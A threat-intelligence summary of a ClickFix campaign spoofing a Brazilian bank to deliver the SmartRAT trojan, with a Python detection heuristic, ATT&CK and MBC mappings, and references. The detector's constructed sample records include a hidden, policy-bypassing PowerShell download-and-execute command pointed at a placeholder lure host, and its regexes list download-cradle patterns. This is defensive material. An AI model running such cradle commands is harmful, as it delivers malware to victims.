EXECUTIVE SUMMARY:
A malicious campaign impersonating a Brazilian bank uses an AI-generated website with a ClickFix technique to deliver the PowerShell-based SmartRAT. Threat actors use typosquatting domains and fake CAPTCHAs to pressure victims into executing harmful commands. The malware supports encrypted C2 communications, remote control capabilities, credential theft through keylogging and banking overlays, and persistence via scheduled tasks and Windows services. AI-generated webpages include anti-inspection measures designed to hinder analysis by disabling common keyboard shortcuts and clearing console logs. A flaw in the AI-generated C2 panel allows bypassing authentication, posing a significant threat to financial institutions.
The campaign leverages AI-powered website creation tools to generate convincing lures at scale, enabling rapid deployment of malicious content. The ClickFix technique combines a fake CAPTCHA with a fullscreen fake BSOD (system recovery prompt) to trick users into executing PowerShell commands that download and execute the SmartRAT. This malware family is designed for remote access and financial data theft, including the theft of banking credentials and the interception of QR codes.
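The ClickFix chain described above ends with a user pasting a PowerShell download-and-execute command into a shell, which leaves a distinctive process-creation footprint. The following detection heuristic is an added example written for this page; it is not code from the original report or from the SmartRAT campaign. It scans process-creation records for PowerShell launched from the user's shell (explorer.exe) with window-hiding or policy-bypass switches plus a download cradle or an encoded command. The record format (tab-separated `Key=Value` fields modelled loosely on Sysmon Event ID 1), the field names and all sample lines are constructed assumptions; the URL in the sample is a placeholder.

```python
"""ClickFix-style PowerShell execution heuristic (added example, constructed data).

Flags process-creation records where powershell.exe/pwsh.exe is started by a
user-facing shell (explorer.exe) and the command line carries the traits a
ClickFix lure produces: hidden window, execution-policy bypass, a download
cradle combined with in-memory invocation, or an encoded command.
"""
import re
from dataclasses import dataclass, field

# Switch spellings PowerShell accepts (abbreviated forms included), case-insensitive.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_POLICY = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
ENCODED_CMD = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
INVOKE_EXPR = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
USER_SHELL_PARENTS = {"explorer.exe"}  # interactive launch (Run dialog, desktop)


@dataclass
class Verdict:
    suspicious: bool
    indicators: list = field(default_factory=list)


def parse_record(line: str) -> dict:
    """Parse one constructed 'Key=Value<TAB>Key=Value' process-creation record."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        if "=" in part:
            key, _, value = part.partition("=")  # values may contain '='
            fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(record: dict) -> Verdict:
    """Score a single record; only PowerShell launches are considered."""
    image = image_name(record.get("Image", ""))
    parent = image_name(record.get("ParentImage", ""))
    cmd = record.get("CommandLine", "")
    indicators = []
    if image not in POWERSHELL_IMAGES:
        return Verdict(False, indicators)
    if parent in USER_SHELL_PARENTS:
        indicators.append("launched from user shell")
    if HIDDEN_WINDOW.search(cmd):
        indicators.append("hidden window")
    if BYPASS_POLICY.search(cmd):
        indicators.append("execution policy bypass")
    if ENCODED_CMD.search(cmd):
        indicators.append("encoded command")
    if DOWNLOAD_CRADLE.search(cmd):
        indicators.append("download cradle")
    if INVOKE_EXPR.search(cmd):
        indicators.append("in-memory invocation")
    # Decision: interactive parent AND (download+execute cradle OR encoded payload).
    suspicious = "launched from user shell" in indicators and (
        ("download cradle" in indicators and "in-memory invocation" in indicators)
        or "encoded command" in indicators
    )
    return Verdict(suspicious, indicators)


def scan(lines) -> list:
    """Indexes of records that meet the ClickFix heuristic."""
    return [i for i, line in enumerate(lines) if analyze(parse_record(line)).suspicious]


# Constructed sample records (not real telemetry). The URL is a placeholder.
SAMPLE_RECORDS = [
    "\t".join([r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"ParentImage=C:\Windows\System32\svchost.exe",
               r"CommandLine=powershell.exe -File C:\Scripts\inventory.ps1"]),
    "\t".join([r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"ParentImage=C:\Windows\explorer.exe",
               r'CommandLine=powershell -w hidden -ep bypass -c "iex (iwr https://lure.example.invalid/verify)"']),
    "\t".join([r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"ParentImage=C:\Windows\explorer.exe",
               r"CommandLine=powershell.exe -NoProfile -Command Get-Process"]),
    "\t".join([r"Image=C:\Program Files\PowerShell\7\pwsh.exe",
               r"ParentImage=C:\Windows\explorer.exe",
               r"CommandLine=pwsh -nop -w hidden -enc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]),
]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_RECORDS):
        v = analyze(parse_record(line))
        print(i, "SUSPICIOUS" if v.suspicious else "ok", "; ".join(v.indicators))
```

The parent-process condition is what separates the lure from routine administration: an operator running a cradle from a terminal or a scheduled task spawning a script does not match, while a command pasted into the Run dialog does. Tune `USER_SHELL_PARENTS` to the shells your fleet actually exposes to users.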
The use of AI-generated content in phishing campaigns represents a growing threat vector with significant implications for cybersecurity defenses. The ability to create lures quickly at scale highlights the evolving tactics used by threat actors. While technical details such as encrypted C2 communications and remote control capabilities are critical, the broader significance lies in the need for organizations to strengthen defenses against AI-generated phishing campaigns through enhanced user awareness training and improved detection mechanisms.
THREAT PROFILE:

| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1543.003 | Create or Modify System Process | Windows Service |
| Defence Evasion | T1036.005 | Masquerading | Match Legitimate Resource Name or Location |
| Credential access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command and control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:

| Objective | Behavior ID | Behavior |
|---|---|---|
| Command & Control | B0030 | C2 Communication |
| Impact | B0022 | Remote Access |
| Discovery | E1083 | File and Directory Discovery |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Execution | E1204 | User Execution |
| Command & Control | E1105 | Ingress Tool Transfer |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/hackers-abuse-powershell-commands/
https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat